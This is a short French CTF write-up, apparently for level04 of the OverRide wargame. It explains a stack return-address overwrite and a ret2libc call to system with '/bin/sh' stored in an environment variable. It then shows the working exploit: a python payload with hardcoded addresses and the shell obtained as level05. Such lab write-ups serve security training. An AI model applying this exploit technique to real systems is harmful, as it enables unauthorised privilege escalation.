11 lines
1.0 KiB
Plaintext
11 lines
1.0 KiB
Plaintext
On remarque qu'on peut faire un ret override apres 156 'A', en revanche on ne peut pas utiliser de shellcode a cause du ptrace et de mecanique de fork (je crois). Il faut donc utiliser un ret2libc et appeler system avec l'argument "/bin/sh", on va devoir mettre des espace devant pour faire un un nop slide, en effet on n'est pas sur de taper au bon endroit en dehors de gdb et system trim l'input. Il faut aussi passer le bon argument a system, on peut le faire 8 bytes apres l'addresse du call on met l'address de notre variable d'evironnement dedans
|
|
|
|
level04@OverRide:~$ export EGG=" /bin/sh"
|
|
level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > /tmp/exploit.txt
|
|
level04@OverRide:~$ cat /tmp/exploit.txt - | ./level04
|
|
Give me some shellcode, k
|
|
whoami
|
|
level05
|
|
|
|
|